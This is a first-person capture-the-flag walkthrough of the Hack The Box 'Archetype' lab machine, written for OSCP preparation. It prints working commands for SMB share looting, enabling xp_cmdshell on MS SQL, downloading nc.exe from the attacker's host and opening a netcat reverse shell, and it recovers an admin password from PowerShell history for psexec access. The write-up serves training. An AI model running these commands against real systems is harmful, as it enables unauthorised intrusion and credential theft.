Box 1: HTB - Archetype

This is the 1st box in my journey to OSCP exam.

Enumeration

Normally, I used Nmap to begin my port scanning and reconnaisance. For explanation about nmap syntax and its parameter, visit this site: https://explainshell.com/

nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.27 --open

PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack ttl 127 Microsoft SQL Server 2017 14.00.1000.00; RTM
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00

Oh, let me check what we found:

• 5985 & 47001 are ports for HTTP service, however they’re API. I try get accessing via browser, but unsuccessfully. I’ve also tried web directory enumerating with dirsearch, dirb but there’s nothing left there.
• Dynamic ports (from 49664–49669) are high port numbers, i was gonna ignore them, though still research for some clue. Found this, many services rely on the Remote Procedure Call (RPC) or DCOM features in Microsoft Windows to assign them dynamic TCP ports. Specifically, these are local ports, used by Task Scheduler, Spooler, Eventlog, Skype. You can’t disable these unless you stop the processes listening on these ports. Check this.

Nevertheless, I identified ports I thought were interesting, such as 139, 445 and 1433

• Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
• Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the Internet.
• Port 1433: Microsoft’s SQL Server, including the desktop editions that are often silently installed with other Microsoft applications, opens and services queries delivered over incoming TCP connections through this port.

Next, It is worth checking to see whether anonymous access has been permitted, as file shares often store configuration files containing passwords or other sensitive information. We can use smbclient to list available shares, try no username + no password with option -L to get a list of shares available on a host, option -N or --no-pass to ask for no password.

smbclient -L -N //10.10.10.27

“backups” share is suspicious

Great, there are two available shares with read access:

• IPC$: this hidden share is a special share used for inter-process communication. It doesn’t allow one to access files or directories like other shares, but rather allows one to communicate with processes running on the remote system.
• backups: a normal share with read access. It lacks a comment which means it could contain interesting data if we’re able to connect to it.

As usual, “backups” is an interesting folder to start with, let’s attempt to access it and see what’s inside. Use below command:

smbclient -N //10.10.10.27/backups

First, use help to list all commands we can use here. Then, let’s use dir to list all things contained in here. Yup, this directory contained an interesting file called “prod.dtsConfig”. You couldn’t use cat or type here to view content of this file. Therefore, I used get <file name>command to download the file to my local machine which I could then open using cat

User ID & Password for Microsoft SQL login

Haha, two helpful pieces of information were User ID and Password, and I’m sure with you that they’re used to access MS SQL service. Now, we need some SQL client tool to access SQL database, such as SSMS on Windows machines, though I’m using Kali.

Foothold

After searching on Google, a lot of pentester recommend using a script called “mssqlclient.py” in Impacket tool suite which is installed on Kali. The first step, move to directory of Impacket tools. After that, use to script to login MS SQL database:

cd /usr/share/doc/python3-impacket/examples/

python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

mssqlclient.py Options:

-h | --help : Show usage and all optional arguments

-windows-auth : whether or not to use Windows Authentication (default False)

After successful login, we can use the IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges. Syntax:

SELECT IS_SRVROLEMEMBER('sysadmin')

The result returned is 1 and it indicate that we have sysadmin role. This will allow us to enable xp_cmdshell and gain RCE on the host. Check help to show something we can do here.

enter “help”

As you see, we can use enable_xp_cmdshell to enable xp_cmdshell and go ahead. Instead, we have another way to deal with this. Let’s attempt this, by inputting the commands below:

SQL> EXEC sp_configure 'show advanced options', 1
SQL> RECONFIGURE
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> RECONFIGURE
SQL> xp_cmdshell "whoami"

If you can see this commnad’s output, congratulations!

Great, so we now know that we are a sysadmin and that we can execute commands. Next thing I did is try to spawn a reverse-shell connection to my Kali machine. After a bit of research, I found out that one way to execute the reverse-shell is to host a file containing the reverse shell script somewhere locally on my Kali and then request the SQL server to connect to my Kali machine, download that script and execute it.

I decide to use this familiar tool to connect SQL server back to my Kali: Netcat. So turn off your anti-virus software temporarily and download it here.

Let’s host this nc.exe somewhere on your Kali. Next, change current directory to the directory containing file nc.exe. Setup your web server to host this file on port 80 (HTTP):

python -m SimpleHTTPServer 80

Port 80 (HTTP) is listening …

Get back to SQL server, try using this command to download nc.exe from my Kali web server. Note that 10.10.14.113 is my Kali IP address.

xp_cmdshell "powershell wget http://10.10.14.113:80/nc.exe"

An error occurred … read the warning carefully

Try again with these below options, remember to define output for easy locating on your Kali:

xp_cmdshell "powershell wget -UseBasicParsing http://10.10.14.113:80/nc.exe -OutFile %temp%/nc.exe"

Note: Here, %temp% will be equal to C:\Users\sql_svc\AppData\Local\Temp\nc.exe

SQL server downloaded nc.exe successfully from Kali machine

After that, in another window we spawn a Netcat listener listening on port 443:

nc -lvnp 443

At last, let’s bomb our executable file “nc.exe” which will connect to our Netcat Listener. More about Netcat syntax, please check this.

xp_cmdshell "%temp%/nc.exe -nv 10.10.14.113 443 -e cmd.exe"

Yup!! We got this!

We’ve logged in to SQL server CMD successfully, ashell is received as sql_svc account. Check this user’s Desktop and you will see user.txt which contains the flag.

“type” command to view content of file…

Privilege Escalation

Well, now that we got the user’s flag, we need to get the administrator flag too. There was only one problem, I had no idea where to go next, so I had to research Windows privilege escalation techniques. Here I stumbled upon a very helpful checklist.

The systeminfo command didn’t help much apart identifying the OS version to “Microsoft Windows Server 2019 Standard”.

Next, I checked the environment variables following the checklist with SET command but nothing new or interesting was found.

PowerShell history was next on the checklist. I first needed to find the path where it could be found and after a short Googling, I found a useful article. The location of the file could be identified using the Get-PSReadlineOption command and looking for the HistorySavePath key.

The located path is:
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Thank God! It’s here…

Let’s check what does “net.exe use” command do by looking at the documentation. The net use command is a Command Prompt command that’s used to connect to, remove, and configure connections to shared resources, like mapping drives and network printers. So this command maps \\Archetype\backupsshared resource to a new drive called “T:” with credentials needed for connecting to it - administrator:MEGACORP_4dm1n!!

Now that we need to find a way to connect to the machine as that user with something similar as SSH. Here is a list of tools I found that could help with the situation. The next tool in line was psexec.py script from Impacket library. Documentation about the original PsExec from Sysinternals can be found here. This tool allows us to connect to a remote windows host, and by combining it with credentials we gathered, we can now connect to the host and gain admin access.

More about “Impacket”, we can connect to Victims machine remotely using this Python libraries which you can download from here. Many other tools in that can be used to do RCE, let’s go check this.

“whoami” command shows you got SYSTEM…

After gaining admin access, we simply traverse to Administrator’s desktop and read the root flag (I wouldn’t disclose it).

Finally, this is my 1st story on Medium, also the 1st box on journey to pursue OSCP exam. I’ll try to complement the details when possible.

THANKS FOR READING AND SUPPORTING!